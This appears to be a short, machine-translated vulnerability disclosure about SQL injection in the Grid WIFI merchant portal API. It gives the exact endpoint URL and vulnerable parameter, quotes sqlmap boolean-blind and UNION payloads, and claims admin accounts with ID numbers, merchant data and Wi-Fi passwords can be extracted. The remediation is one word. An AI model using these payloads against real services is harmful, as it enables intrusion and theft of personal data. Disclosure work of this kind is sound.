Grid WIFI injection leaks tens of thousands of O2O merchant information and Wi-Fi passwords
Grid WIFI has an injection vulnerability, which allows you to download information of all merchants, log on to the background, and use Wi-Fi passwords.
An api url can be injected:
Http://portal.wangge.cc/api/index_v2.php? Act = fetchsupinfo & gw_id = gw_yysx
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: gw_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: act=fetchsupinfo&gw_id=gw_yysx' AND 4455=4455# Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: act=fetchsupinfo&gw_id=-4311' UNION ALL SELECT NULL,CONCAT(0x7170706a71,0x48674363455743474866,0x7170716a71)#---
All databases:
All tables:
All admin accounts, including ID card numbers...
Log on to a background merchant information and wi-fi password
Solution:
Filter